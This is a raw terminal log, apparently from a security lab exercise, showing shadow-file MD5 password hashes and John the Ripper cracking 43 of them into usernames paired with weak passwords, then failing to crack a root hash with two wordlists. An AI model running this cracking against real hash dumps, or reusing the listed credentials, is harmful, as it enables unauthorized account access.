jalvarez:$1$JnQ0E7xo$tniBSw30ynprzjZUhuGUw0:16083:0:99999:7:::
mrodriguez:$1$JMS0J7xo$Qx1XpV6Yic0pmkuiZ.Txd/:16083:0:99999:7:::
rjacobson:$1$MxT0O7xo$QCmvDFxusxS9kxc4r./121:16083:0:99999:7:::
dcooper:$1$rhV0T7xo$28uQIQes7LxuYP3cOOwkE.:16083:0:99999:7:::
mholland:$1$m9X0Y7xo$vs7fehRv9EsaPuA.1Kmem1:16083:0:99999:7:::
aallen:$1$fnY0d7xo$aotMzNPT380HaEKgBB2Fd0:16083:0:99999:7:::
ccoffee:$1$XTa0i7xo$iji75/uqgm4yjzEjhCogr/:16083:0:99999:7:::
sjohnson:$1$e8c0n7xo$56pZc850Z/jVyfytGmBoX0:16083:0:99999:7:::
bwatkins:$1$Tjd0s7xo$8cabV.U80eIG6e7QfwAoN.:16083:0:99999:7:::
kwebber:$1$Dbf0x7xo$yErk7QzGlwUicnNXAI5S91:16083:0:99999:7:::
rpatel:$1$gEh008xo$Vf9/sa3I8y.ZAVVyvmIwU.:16083:0:99999:7:::
jduff:$1$Lki058xo$FaxE0BYi59/Brd/S0MKxT.:16083:0:99999:7:::
mnader:$1$tKk0A8xo$RqOuKq1VLQUaLhjxLV4yL/:16083:0:99999:7:::
strammel:$1$pyl0F8xo$8iJPFq2KWil4NBRKARDTu1:16083:0:99999:7:::
dstevens:$1$CQn0K8xo$4lawd8BU2mdjLfxm2N1WM0:16083:0:99999:7:::

root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty           (tdeleon)
12345            (myajima)
password         (jfranklin)
123456           (amaynard)
computer         (ktso)
12345678         (qpowers)
abc123           (dgilfillan)
internet         (rjacobson)
shadow           (swarren)
baseball         (mholland)
letmein          (tgoodchap)
michael          (jayala)
dragon           (strammel)
michelle         (lmartinez)
jordan           (mrodriguez)
trustno1         (jduff)
soccer           (mnader)
football         (sjohnson)
batman           (sgains)
iloveyou         (bbanter)
pepper           (mbryan)
jennifer         (dstevens)
master           (lmorales)
monkey           (aspears)
sunshine         (bphillips)
whatever         (aadams)
welcome          (hlovell)
111111           (djohnson)
666666           (jalvarez)
654321           (aheflin)
killer           (kclemons)
princess         (ccoffee)
superman         (bwatkins)
123123           (aweiland)
1234567          (cchisholm)
cheese           (dgrant)
starwars         (dtraylor)
Password         (jbresnahan)
nintendo         (aallen)
passw0rd         (aharp)
blahblah         (dwestling)
pokemon          (jalcantar)
0                (rpatel)
guesses: 43  time: 0:00:01:34 0.00% (3)  c/s: 29442  trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014)  c/s: 29222  trying: émigré - �f

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014)  c/s: 29211  trying:      123d - * 7¡Vamos!

That's all.